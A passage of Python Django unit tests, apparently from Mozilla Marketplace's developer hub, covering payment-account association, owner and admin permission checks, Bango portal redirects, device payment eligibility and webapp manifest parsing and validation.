eq_(res.status_code, 200)
eq_(self.webapp.payment_account(PROVIDER_BANGO).payment_account.pk,
acct.pk)
eq_(AddonPremium.objects.all().count(), 0)
eq_(len(pq(res.content)('#paid-island-incomplete.hidden')), 1)
def test_associate_acct_to_app(self):
self.make_premium(self.webapp, price=self.price.price)
acct, user = self.setup_payment_acct(make_owner=True)
# Must be an app owner to change this.
assert self.is_owner(user)
# Associate account with app.
for k in [self.generic_patcher.product.get_object_or_404,
self.bango_patcher.product.get_object_or_404]:
k.side_effect = ObjectDoesNotExist
res = self.client.post(
self.url, self.get_postdata({'price': self.price.pk,
'accounts': acct.pk,
'regions': ALL_REGION_IDS}),
follow=True)
self.assertNoFormErrors(res)
eq_(res.status_code, 200)
eq_(len(pq(res.content)('#paid-island-incomplete.hidden')), 1)
eq_(self.webapp.payment_account(PROVIDER_BANGO).payment_account.pk,
acct.pk)
kw = self.generic_patcher.product.post.call_args[1]['data']
eq_(kw['access'], ACCESS_PURCHASE)
kw = self.bango_p_patcher.product.post.call_args[1]['data']
ok_(kw['secret'], kw)
def test_acct_region_sorting_by_locale(self):
self.make_premium(self.webapp, price=self.price.price)
res = self.client.get(self.url + '?lang=en')
regions = res.context['provider_regions'][PROVIDER_BANGO]
eq_(regions, [SPAIN, UK, US])
# Form choices sort in English.
form_choices = [r[1] for r in
res.context['region_form']['regions'].field.choices]
# For EN, Spain comes before United Kingdom.
ok_(form_choices.index(SPAIN.name) < form_choices.index(UK.name))
# and United Kingdome comes before United States.
ok_(form_choices.index(UK.name) < form_choices.index(US.name))
def test_acct_region_sorting_by_locale_fr(self):
self.make_premium(self.webapp, price=self.price.price)
res = self.client.get(self.url + '?lang=fr')
regions = res.context['provider_regions'][PROVIDER_BANGO]
# En français: Espagne, États-Unis, Royaume-Uni
# Without unicode normalization this would be:
# Espagne, Royaume-Uni, États-Unis
eq_(regions, [SPAIN, US, UK])
# Check we're also doing a normalized sort of the form choices.
form_choices = [r[1] for r in
res.context['region_form']['regions'].field.choices]
# For FR, Espagne comes before États-Unis.
ok_(form_choices.index(SPAIN.name) < form_choices.index(US.name))
# and États-Unis comes before Royaume-Uni.
ok_(form_choices.index(US.name) < form_choices.index(UK.name))
def test_associate_acct_to_app_when_not_owner(self):
self.make_premium(self.webapp, price=self.price.price)
self.login(self.other)
acct, user = self.setup_payment_acct(make_owner=False, user=self.other)
# Check we're not an owner before we start.
assert not self.is_owner(user)
# Attempt to associate account with app as non-owner.
res = self.client.post(
self.url, self.get_postdata({'accounts': acct.pk}), follow=True)
# Non-owner posts are forbidden.
eq_(res.status_code, 403)
# Payment account shouldn't be set as we're not the owner.
assert not (AddonPaymentAccount.objects
.filter(addon=self.webapp).exists())
def test_associate_acct_to_app_when_not_owner_and_an_admin(self):
self.make_premium(self.webapp, self.price.price)
self.login(self.admin)
acct, user = self.setup_payment_acct(make_owner=False, user=self.admin)
# Check we're not an owner before we start.
assert not self.is_owner(user)
assert not (AddonPaymentAccount.objects
.filter(addon=self.webapp).exists())
# Attempt to associate account with app as non-owner admin.
res = self.client.post(self.url,
self.get_postdata({'accounts': acct.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
self.assertFalse(AddonPaymentAccount.objects
.filter(addon=self.webapp)
.exists(),
'account was associated')
pqr = pq(res.content)
# Payment field should be disabled.
eq_(len(pqr('#id_form-0-accounts[disabled]')), 1)
# There's no existing associated account.
eq_(len(pqr('.current-account')), 0)
def test_associate_acct_to_app_when_admin_and_owner_acct_exists(self):
def current_account():
return self.webapp.payment_account(PROVIDER_BANGO).payment_account
self.make_premium(self.webapp, price=self.price.price)
owner_acct, owner_user = self.setup_payment_acct(make_owner=True)
assert self.is_owner(owner_user)
self.client.post(self.url,
self.get_postdata({'accounts': owner_acct.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
assert (AddonPaymentAccount.objects
.filter(addon=self.webapp).exists())
self.login(self.admin)
admin_acct, admin_user = self.setup_payment_acct(make_owner=False,
user=self.admin)
# Check we're not an owner before we start.
assert not self.is_owner(admin_user)
assert current_account().pk == owner_acct.pk
self.client.post(self.url,
self.get_postdata({'accounts': admin_acct.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
assert current_account().pk == owner_acct.pk
def test_one_owner_and_a_second_one_sees_selected_plus_own_accounts(self):
self.make_premium(self.webapp, price=self.price.price)
owner_acct, owner = self.setup_payment_acct(make_owner=True)
# Should be an owner.
assert self.is_owner(owner)
res = self.client.post(
self.url, self.get_postdata({'accounts': owner_acct.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
assert (AddonPaymentAccount.objects
.filter(addon=self.webapp).exists())
# Login as other user.
self.login(self.other)
owner_acct2, owner2 = self.setup_payment_acct(make_owner=True,
user=self.other)
assert self.is_owner(owner2)
# Should see the saved account plus 2nd owner's own account select
# and be able to save their own account but not the other owners.
res = self.client.get(self.url)
eq_(res.status_code, 200)
pqr = pq(res.content)
# Check we have just our account option present + '----'.
eq_(len(pqr('#id_form-0-accounts option')), 2)
eq_(len(pqr('#id_account[disabled]')), 0)
eq_(pqr('.current-account').text(), unicode(owner_acct))
res = self.client.post(
self.url, self.get_postdata({'accounts': owner_acct2.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
eq_(res.status_code, 200)
self.assertNoFormErrors(res)
pqr = pq(res.content)
eq_(len(pqr('.current-account')), 0)
eq_(pqr('#id_form-0-accounts option[selected]').text(),
unicode(owner_acct2))
# Now there should just be our account.
eq_(len(pqr('#id_form-0-accounts option')), 1)
def test_existing_account_should_be_disabled_for_non_owner(self):
self.make_premium(self.webapp, price=self.price.price)
acct, user = self.setup_payment_acct(make_owner=True)
# Must be an app owner to change this.
assert self.is_owner(user)
# Associate account with app.
res = self.client.post(
self.url, self.get_postdata({'accounts': acct.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
amo.set_user(self.other)
# Make this user a dev so they have access to the payments page.
AddonUser.objects.create(addon=self.webapp,
user=self.other, role=amo.AUTHOR_ROLE_DEV)
self.login(self.other)
# Make sure not an owner.
assert not self.is_owner(self.other)
res = self.client.get(self.url)
eq_(res.status_code, 200)
pqr = pq(res.content)
# No accounts setup.
eq_(len(pqr('.no-accounts')), 1)
# Currently associated account should be displayed separately.
eq_(pqr('.current-account').text(), unicode(acct))
def test_existing_account_should_be_disabled_for_non_owner_admin(self):
self.make_premium(self.webapp, price=self.price.price)
# Login as regular user
self.login(self.other)
owner_acct, user = self.setup_payment_acct(make_owner=True,
user=self.other)
# Must be an app owner to change this.
assert self.is_owner(self.other)
# Associate account with app.
res = self.client.post(self.url,
self.get_postdata({'accounts': owner_acct.pk,
'price': self.price.pk,
'regions': ALL_REGION_IDS}),
follow=True)
self.assertNoFormErrors(res)
# Login as admin.
self.login(self.admin)
# Create an account as an admin.
admin_acct, admin_user = self.setup_payment_acct(make_owner=False,
user=self.admin)
# Make sure not an owner.
assert not self.is_owner(self.admin)
res = self.client.get(self.url)
eq_(res.status_code, 200)
pqr = pq(res.content)
# Payment field should be disabled.
eq_(len(pqr('#id_form-0-accounts[disabled]')), 1)
# Currently associated account should be displayed separately.
eq_(pqr('.current-account').text(), unicode(owner_acct))
def test_deleted_payment_accounts_switch_to_incomplete_apps(self):
self.make_premium(self.webapp, price=self.price.price)
self.login(self.user)
addon_account = setup_payment_account(self.webapp, self.user)
eq_(self.webapp.status, amo.STATUS_PUBLIC)
self.client.post(reverse(
'mkt.developers.provider.delete_payment_account',
args=[addon_account.payment_account.pk]))
eq_(self.webapp.reload().status, amo.STATUS_NULL)
def test_addon_payment_accounts_with_or_without_addons(self):
self.make_premium(self.webapp, price=self.price.price)
self.login(self.user)
addon_account = setup_payment_account(self.webapp, self.user)
payment_accounts = reverse('mkt.developers.provider.payment_accounts')
res = self.client.get(payment_accounts)
eq_(json.loads(res.content)[0]['app-names'],
u'Something Something Steamcube!')
for apa in addon_account.payment_account.addonpaymentaccount_set.all():
apa.addon.delete()
res = self.client.get(payment_accounts)
eq_(json.loads(res.content)[0]['app-names'], u'')
def setup_bango_portal(self):
self.user = UserProfile.objects.get(pk=31337)
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
self.login(self.user)
self.account = setup_payment_account(self.webapp, self.user)
self.portal_url = self.webapp.get_dev_url(
'payments.bango_portal_from_addon')
def test_template_switches(self):
payments_url = self.webapp.get_dev_url('payments')
providers = ['reference', 'boku', 'bango']
for provider in providers:
with self.settings(PAYMENT_PROVIDERS=[provider],
DEFAULT_PAYMENT_PROVIDER=provider):
res = self.client.get(payments_url)
tmpl_id = '#{p}-payment-account-add-template'.format(p=provider)
tmpl = self.extract_script_template(res.content, tmpl_id)
eq_(len(tmpl('.payment-account-{p}'.format(p=provider))), 1)
def test_bango_portal_links(self):
payments_url = self.webapp.get_dev_url('payments')
res = self.client.get(payments_url)
account_template = self.extract_script_template(
res.content, '#account-row-template')
eq_(len(account_template('.portal-account')), 1)
@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect(self, api):
self.setup_bango_portal()
authentication_token = u'D0A44686-D4A3-4B2F-9BEB-5E4975E35192'
api.bango.login.post.return_value = {
'person_id': 600925,
'email_address': u'[email protected]',
'authentication_token': authentication_token,
}
assert self.is_owner(self.user)
res = self.client.get(self.portal_url)
eq_(res.status_code, 204)
eq_(api.bango.login.post.call_args[0][0]['packageId'],
int(TEST_PACKAGE_ID))
redirect_url = res['Location']
assert authentication_token in redirect_url, redirect_url
assert 'emailAddress=admin%40place.com' in redirect_url, redirect_url
@mock.patch('mkt.developers.views_payments.client.api')
def test_bango_portal_redirect_api_error(self, api):
self.setup_bango_portal()
err = {'errors': 'Something went wrong.'}
api.bango.login.post.side_effect = HttpClientError(content=err)
res = self.client.get(self.portal_url)
eq_(res.status_code, 400)
eq_(json.loads(res.content), err)
def test_not_bango(self):
self.setup_bango_portal()
self.account.payment_account.provider = PROVIDER_REFERENCE
self.account.payment_account.save()
res = self.client.get(self.portal_url)
eq_(res.status_code, 403)
def test_bango_portal_redirect_role_error(self):
# Checks that only the owner can access the page (vs. developers).
self.setup_bango_portal()
addon_user = self.user.addonuser_set.all()[0]
addon_user.role = amo.AUTHOR_ROLE_DEV
addon_user.save()
assert not self.is_owner(self.user)
res = self.client.get(self.portal_url)
eq_(res.status_code, 403)
def test_bango_portal_redirect_permission_error(self):
# Checks that the owner of another app can't access the page.
self.setup_bango_portal()
self.login(self.other)
other_webapp = Addon.objects.create(type=self.webapp.type,
status=self.webapp.status, name='other-%s' % self.webapp.id,
premium_type=amo.ADDON_PREMIUM)
AddonUser.objects.create(addon=other_webapp,
user=self.other, role=amo.AUTHOR_ROLE_OWNER)
res = self.client.get(self.portal_url)
eq_(res.status_code, 403)
def test_bango_portal_redirect_solitude_seller_error(self):
# Checks that the owner has a SolitudeSeller instance for this app.
self.setup_bango_portal()
assert self.is_owner(self.user)
for acct in self.webapp.app_payment_accounts.all():
acct.payment_account.solitude_seller.update(user=self.other)
res = self.client.get(self.portal_url)
eq_(res.status_code, 403)
def test_device_checkboxes_present_with_android_payments(self):
self.create_flag('android-payments')
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#paid-android-mobile input[type="checkbox"]')), 1)
eq_(len(pqr('#paid-android-tablet input[type="checkbox"]')), 1)
def test_device_checkboxes_not_present_without_android_payments(self):
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#paid-android-mobile input[type="checkbox"]')), 0)
eq_(len(pqr('#paid-android-tablet input[type="checkbox"]')), 0)
def test_cannot_be_paid_with_android_payments_just_ffos(self):
self.create_flag('android-payments')
self.webapp.addondevicetype_set.get_or_create(
device_type=amo.DEVICE_GAIA.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], False)
def test_cannot_be_paid_without_android_payments_just_ffos(self):
self.webapp.addondevicetype_set.filter(
device_type=amo.DEVICE_GAIA.id).delete()
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], True)
def test_cannot_be_paid_with_android_payments(self):
self.create_flag('android-payments')
for device_type in (amo.DEVICE_GAIA,
amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
self.webapp.addondevicetype_set.get_or_create(
device_type=device_type.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], False)
def test_cannot_be_paid_without_android_payments(self):
for device_type in (amo.DEVICE_GAIA,
amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
self.webapp.addondevicetype_set.get_or_create(
device_type=device_type.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], True)
def test_cannot_be_paid_pkg_with_desktop_pkg(self):
self.create_flag('desktop-packaged')
self.webapp.update(is_packaged=True)
for device_type in (amo.DEVICE_GAIA,
amo.DEVICE_DESKTOP):
self.webapp.addondevicetype_set.get_or_create(
device_type=device_type.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], True)
def test_cannot_be_paid_pkg_without_desktop_pkg(self):
self.webapp.update(is_packaged=True)
self.webapp.addondevicetype_set.get_or_create(
device_type=amo.DEVICE_GAIA.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], False)
def test_cannot_be_paid_pkg_with_android_pkg_no_android_payments(self):
self.create_flag('android-packaged')
self.webapp.update(is_packaged=True)
for device_type in (amo.DEVICE_GAIA,
amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
self.webapp.addondevicetype_set.get_or_create(
device_type=device_type.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], True)
def test_cannot_be_paid_pkg_with_android_pkg_w_android_payments(self):
self.create_flag('android-packaged')
self.create_flag('android-payments')
self.webapp.update(is_packaged=True)
for device_type in (amo.DEVICE_GAIA,
amo.DEVICE_MOBILE, amo.DEVICE_TABLET):
self.webapp.addondevicetype_set.get_or_create(
device_type=device_type.id)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['cannot_be_paid'], False)
def test_no_desktop_if_no_packaged_desktop_flag(self):
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#free-desktop')), 0)
def test_no_android_if_no_packaged_android_flag(self):
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#free-android-mobile')), 0)
eq_(len(pqr('#free-android-tablet')), 0)
def test_desktop_if_packaged_desktop_flag_is_set(self):
self.create_flag('desktop-packaged')
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#free-desktop')), 1)
def test_android_if_packaged_android_flag_is_set(self):
self.create_flag('android-packaged')
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
pqr = pq(res.content)
eq_(len(pqr('#free-android-mobile')), 1)
eq_(len(pqr('#free-android-tablet')), 1)
class TestRegions(amo.tests.TestCase):
fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')
def setUp(self):
self.webapp = self.get_webapp()
AddonDeviceType.objects.create(
addon=self.webapp, device_type=amo.DEVICE_GAIA.id)
self.url = self.webapp.get_dev_url('payments')
self.username = '[email protected]'
assert self.client.login(username=self.username, password='password')
self.patch = mock.patch('mkt.developers.models.client')
self.sol = self.patch.start()
def tearDown(self):
self.patch.stop()
def get_webapp(self):
return Addon.objects.get(pk=337141)
def get_dict(self, **kwargs):
extension = {'regions': mkt.regions.ALL_REGION_IDS,
'other_regions': 'on',
'free_platforms': ['free-%s' % dt.class_name for dt in
self.webapp.device_types]}
extension.update(kwargs)
return extension
def get_excluded_ids(self):
return sorted(AER.objects.filter(addon=self.webapp)
.values_list('region', flat=True))
def test_edit_all_regions_are_not_excluded(self):
# Keep the category around for good measure.
Category.objects.create(type=amo.ADDON_WEBAPP, slug='games')
r = self.client.post(self.url, self.get_dict())
self.assertNoFormErrors(r)
eq_(AER.objects.count(), 0)
class PaymentsBase(amo.tests.TestCase):
fixtures = fixture('user_editor', 'user_999')
def setUp(self):
self.user = UserProfile.objects.get(pk=999)
self.login(self.user)
self.account = self.create()
def create(self):
# If user is defined on SolitudeSeller, why do we also need it on
# PaymentAccount? Fewer JOINs.
seller = SolitudeSeller.objects.create(user=self.user)
return PaymentAccount.objects.create(user=self.user,
solitude_seller=seller,
uri='/bango/package/123',
name="cvan's cnotes",
agreed_tos=True)
class TestPaymentAccountsAdd(Patcher, PaymentsBase):
# TODO: this test provides bare coverage and might need to be expanded.
def setUp(self):
super(TestPaymentAccountsAdd, self).setUp()
self.url = reverse('mkt.developers.provider.add_payment_account')
def test_login_required(self):
self.client.logout()
self.assertLoginRequired(self.client.post(self.url, data={}))
def test_create(self):
res = self.client.post(self.url, data={
'bankAccountPayeeName': 'name',
'companyName': 'company',
'vendorName': 'vendor',
'financeEmailAddress': '[email protected]',
'adminEmailAddress': '[email protected]',
'supportEmailAddress': '[email protected]',
'address1': 'address 1',
'addressCity': 'city',
'addressState': 'state',
'addressZipCode': 'zip',
'addressPhone': '123',
'countryIso': 'BRA',
'currencyIso': 'EUR',
'bankAccountNumber': '123',
'bankAccountCode': '123',
'bankName': 'asd',
'bankAddress1': 'address 2',
'bankAddressZipCode': '123',
'bankAddressIso': 'BRA',
'account_name': 'account',
'provider': 'bango',
})
eq_(res.status_code, 200)
output = json.loads(res.content)
ok_('pk' in output)
ok_('agreement-url' in output)
eq_(PaymentAccount.objects.count(), 2)
class TestPaymentAccounts(PaymentsBase):
def setUp(self):
super(TestPaymentAccounts, self).setUp()
self.url = reverse('mkt.developers.provider.payment_accounts')
def test_login_required(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_mine(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
output = json.loads(res.content)
eq_(output[0]['id'], self.account.pk)
ok_(''' in output[0]['name']) # Was jinja2 escaped.
class TestPaymentPortal(PaymentsBase):
fixtures = PaymentsBase.fixtures + fixture('webapp_337141')
def setUp(self):
super(TestPaymentPortal, self).setUp()
self.app_slug = 'something-something'
self.url = reverse('mkt.developers.provider.payment_accounts')
self.bango_url = reverse(
'mkt.developers.apps.payments.bango_portal_from_addon',
args=[self.app_slug])
def test_with_app_slug(self):
res = self.client.get(self.url, {'app-slug': self.app_slug})
eq_(res.status_code, 200)
output = json.loads(res.content)
eq_(output[0]['portal-url'], self.bango_url)
def test_without_app_slug(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
output = json.loads(res.content)
eq_(output[0]['portal-url'], '')
def test_reference(self):
amo.tests.app_factory(app_slug=self.app_slug)
PaymentAccount.objects.update(provider=PROVIDER_REFERENCE)
res = self.client.get(self.bango_url)
eq_(res.status_code, 403)
def test_boku(self):
PaymentAccount.objects.update(provider=PROVIDER_BOKU)
with self.settings(PAYMENT_PROVIDERS=['boku']):
res = self.client.get(self.url)
eq_(res.status_code, 200)
output = json.loads(res.content)
eq_(output[0]['portal-url'], settings.BOKU_PORTAL)
class TestPaymentAccount(Patcher, PaymentsBase):
def setUp(self):
super(TestPaymentAccount, self).setUp()
self.url = reverse('mkt.developers.provider.payment_account',
args=[self.account.pk])
def test_login_required(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_get(self):
package = mock.Mock()
package.get.return_value = {'full': {'vendorName': 'testval'}}
self.bango_patcher.package.return_value = package
res = self.client.get(self.url)
self.bango_patcher.package.assert_called_with('123')
eq_(res.status_code, 200)
output = json.loads(res.content)
eq_(output['account_name'], self.account.name)
assert 'vendorName' in output, (
'Details from Bango not getting merged in: %s' % output)
eq_(output['vendorName'], 'testval')
class TestPaymentAgreement(Patcher, PaymentsBase):
def setUp(self):
super(TestPaymentAgreement, self).setUp()
self.url = reverse('mkt.developers.provider.agreement',
args=[self.account.pk])
def test_anon(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_get_bango_only_provider(self):
self.bango_patcher.sbi.agreement.get_object.return_value = {
'text': 'blah', 'valid': '2010-08-31T00:00:00'}
res = self.client.get(self.url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['text'], 'blah')
def test_get_bango_multiple_providers(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'reference'],
DEFAULT_PAYMENT_PROVIDER='reference'):
self.test_get_bango_only_provider()
def test_set_bango_only_provider(self):
self.bango_patcher.sbi.post.return_value = {
'expires': '2014-08-31T00:00:00',
'valid': '2014-08-31T00:00:00'}
res = self.client.post(self.url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['valid'], '2014-08-31T00:00:00')
def test_set_bango_multiple_providers(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'reference'],
DEFAULT_PAYMENT_PROVIDER='reference'):
self.test_set_bango_only_provider()
class TestPaymentAccountsForm(PaymentsBase):
fixtures = PaymentsBase.fixtures + fixture('webapp_337141')
def setUp(self):
super(TestPaymentAccountsForm, self).setUp()
base_url = reverse('mkt.developers.provider.payment_accounts_form')
self.url = base_url + '?provider=bango&app_slug=something-something'
def test_login_required(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_mine(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['account_list_form']
.fields['accounts'].choices.queryset.get(), self.account)
def test_mine_disagreed_tos(self):
self.account.update(agreed_tos=False)
res = self.client.get(self.url)
eq_(res.status_code, 200)
self.assertSetEqual(res.context['account_list_form']
.fields['accounts'].choices.queryset.all(), [])
class TestPaymentDelete(PaymentsBase):
def setUp(self):
super(TestPaymentDelete, self).setUp()
self.url = reverse('mkt.developers.provider.delete_payment_account',
args=[self.account.pk])
def test_login_required(self):
self.client.logout()
self.assertLoginRequired(self.client.post(self.url, data={}))
def test_not_mine(self):
self.login(UserProfile.objects.get(pk=5497308))
eq_(self.client.post(self.url, data={}).status_code, 404)
def test_mine(self):
eq_(self.client.post(self.url, data={}).status_code, 200)
eq_(PaymentAccount.objects.get(pk=self.account.pk).inactive, True)
########NEW FILE########
__FILENAME__ = test_views_validation
# -*- coding: utf-8 -*-
import codecs
import collections
import json
import os
import tempfile
from django import forms
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from files.models import FileUpload
from files.utils import WebAppParser
from mkt.developers.views import standalone_hosted_upload
from mkt.files.helpers import copyfileobj
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
class TestWebApps(amo.tests.TestCase, amo.tests.AMOPaths):
def setUp(self):
self.webapp_path = tempfile.mktemp(suffix='.webapp')
with storage.open(self.webapp_path, 'wb') as f:
copyfileobj(open(os.path.join(os.path.dirname(__file__),
'addons', 'mozball.webapp')),
f)
self.tmp_files = []
self.manifest = dict(name=u'Ivan Krsti\u0107', version=u'1.0',
description=u'summary',
developer=dict(name=u'Dev Namé'))
def tearDown(self):
for tmp in self.tmp_files:
storage.delete(tmp)
def webapp(self, data=None, contents='', suffix='.webapp'):
tmp = tempfile.mktemp(suffix=suffix)
self.tmp_files.append(tmp)
with storage.open(tmp, 'wb') as f:
f.write(json.dumps(data) if data else contents)
return tmp
def test_parse(self):
wp = WebAppParser().parse(self.webapp_path)
eq_(wp['guid'], None)
eq_(wp['type'], amo.ADDON_WEBAPP)
eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
# UTF-8 byte string decoded to unicode.
eq_(wp['description']['es'],
u'\xa1Acci\xf3n abierta emocionante del desarrollo del Web!')
eq_(wp['description']['it'],
u'Azione aperta emozionante di sviluppo di fotoricettore!')
eq_(wp['version'], '1.0')
eq_(wp['default_locale'], 'en-US')
def test_parse_packaged(self):
wp = WebAppParser().parse(self.packaged_app_path('mozball.zip'))
eq_(wp['guid'], None)
eq_(wp['type'], amo.ADDON_WEBAPP)
eq_(wp['name']['en-US'], u'Packaged MozillaBall ょ')
eq_(wp['description']['en-US'], u'Exciting Open Web development action!')
eq_(wp['description']['es'],
u'¡Acción abierta emocionante del desarrollo del Web!')
eq_(wp['description']['it'],
u'Azione aperta emozionante di sviluppo di fotoricettore!')
eq_(wp['version'], '1.0')
eq_(wp['default_locale'], 'en-US')
def test_parse_packaged_BOM(self):
wp = WebAppParser().parse(self.packaged_app_path('mozBOM.zip'))
eq_(wp['guid'], None)
eq_(wp['type'], amo.ADDON_WEBAPP)
eq_(wp['name']['en-US'], u'Packaged MozBOM ょ')
eq_(wp['description']['en-US'], u'Exciting BOM action!')
eq_(wp['description']['es'], u'¡Acción BOM!')
eq_(wp['description']['it'], u'Azione BOM!')
eq_(wp['version'], '1.0')
eq_(wp['default_locale'], 'en-US')
def test_no_manifest_at_root(self):
with self.assertRaises(forms.ValidationError) as exc:
WebAppParser().parse(
self.packaged_app_path('no-manifest-at-root.zip'))
m = exc.exception.messages[0]
assert m.startswith('The file "manifest.webapp" was not found'), (
'Unexpected: %s' % m)
def test_no_locales(self):
wp = WebAppParser().parse(self.webapp(dict(name='foo', version='1.0',
description='description',
developer=dict(name='bar'))))
eq_(wp['description']['en-US'], u'description')
def test_no_description(self):
wp = WebAppParser().parse(self.webapp(dict(name='foo',
version='1.0',
developer=dict(name='bar'))))
eq_(wp['description'], {})
def test_syntax_error(self):
with self.assertRaises(forms.ValidationError) as exc:
WebAppParser().parse(self.webapp(contents='}]'))
m = exc.exception.messages[0]
assert m.startswith('The webapp manifest is not valid JSON.'), (
'Unexpected: %s' % m)
def test_utf8_bom(self):
wm = codecs.BOM_UTF8 + json.dumps(self.manifest, encoding='utf8')
wp = WebAppParser().parse(self.webapp(contents=wm))
eq_(wp['version'], '1.0')
def test_non_ascii(self):
wm = json.dumps(dict(name=u'まつもとゆきひろ', version='1.0',
developer=dict(name=u'まつもとゆきひろ')),
encoding='shift-jis')
wp = WebAppParser().parse(self.webapp(contents=wm))
eq_(wp['name'], {'en-US': u'まつもとゆきひろ'})
@patch('mkt.developers.views.trap_duplicate')
def test_trap_duplicate_skipped_on_standalone(self, trap_duplicate_mock):
self.create_switch('webapps-unique-by-domain')
request = Mock()
request.method = 'POST'
request.POST = {'manifest': ''}
request.return_value = collections.namedtuple('FakeResponse',
'status_code content')
standalone_hosted_upload(request)
assert not trap_duplicate_mock.called
class TestStandaloneValidation(BaseUploadTest):
fixtures = ['base/users']
def setUp(self):
super(TestStandaloneValidation, self).setUp()
assert self.client.login(username='[email protected]',
password='password')
# Upload URLs
self.hosted_upload = reverse(
'mkt.developers.standalone_hosted_upload')
self.packaged_upload = reverse(
'mkt.developers.standalone_packaged_upload')
def hosted_detail(self, uuid):
return reverse('mkt.developers.standalone_upload_detail',
args=['hosted', uuid])
def packaged_detail(self, uuid):
return reverse('mkt.developers.standalone_upload_detail',
args=['packaged', uuid])
def upload_detail(self, uuid):
return reverse('mkt.developers.upload_detail', args=[uuid])
def test_context(self):
res = self.client.get(reverse('mkt.developers.validate_addon'))
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#upload-webapp-url').attr('data-upload-url'),
self.hosted_upload)
eq_(doc('#upload-app').attr('data-upload-url'), self.packaged_upload)
def detail_view(self, url_factory, upload):
res = self.client.get(url_factory(upload.uuid))
res_json = json.loads(res.content)
eq_(res_json['url'], url_factory(upload.uuid))
eq_(res_json['full_report_url'], self.upload_detail(upload.uuid))
res = self.client.get(self.upload_detail(upload.uuid))
eq_(res.status_code, 200)
doc = pq(res.content)
assert doc('header h1').text().startswith('Validation Results for ')
suite = doc('#addon-validator-suite')
# All apps have a `validateurl` value that corresponds to a hosted app.
eq_(suite.attr('data-validateurl'), self.hosted_detail(upload.uuid))
@patch('mkt.developers.tasks._fetch_manifest')
def test_hosted_detail(self, fetch_manifest):
def update_upload(url, upload):
with open(os.path.join(os.path.dirname(__file__),
'addons', 'mozball.webapp'), 'r') as data:
return data.read()
fetch_manifest.side_effect = update_upload
res = self.client.post(
self.hosted_upload, {'manifest': 'http://foo.bar/'}, follow=True)
eq_(res.status_code, 200)
uuid = json.loads(res.content)['upload']
upload = FileUpload.objects.get(uuid=uuid)
self.detail_view(self.hosted_detail, upload)
def test_packaged_detail(self):
data = open(get_image_path('animated.png'), 'rb')
self.client.post(self.packaged_upload, {'upload': data})
upload = FileUpload.objects.get(name='animated.png')
self.detail_view(self.packaged_detail, upload)
########NEW FILE########
__FILENAME__ = test_views_versions
import datetime
import mock
from nose.tools import eq_
import os
from pyquery import PyQuery as pq
from django.conf import settings
import amo
import amo.tests
from amo.tests import req_factory_factory
from addons.models import Addon, AddonUser
from devhub.models import ActivityLog, AppLog
from editors.models import EscalationQueue, EditorSubscription
from files.models import File
from users.models import UserProfile
from versions.models import Version
from mkt.comm.models import CommunicationNote
from mkt.developers.models import PreloadTestPlan
from mkt.developers.views import preload_submit, status
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BasePackagedAppTest
class TestVersion(amo.tests.TestCase):
fixtures = fixture('group_admin', 'user_999', 'user_admin',
'user_admin_group', 'webapp_337141')
def setUp(self):
self.client.login(username='[email protected]', password='password')
self.webapp = self.get_webapp()
self.url = self.webapp.get_dev_url('versions')
def get_webapp(self):
return Addon.objects.get(id=337141)
def test_nav_link(self):
r = self.client.get(self.url)
eq_(pq(r.content)('.edit-addon-nav li.selected a').attr('href'),
self.url)
def test_items(self):
doc = pq(self.client.get(self.url).content)
eq_(doc('#version-status').length, 1)
eq_(doc('#version-list').length, 0)
eq_(doc('#delete-addon').length, 1)
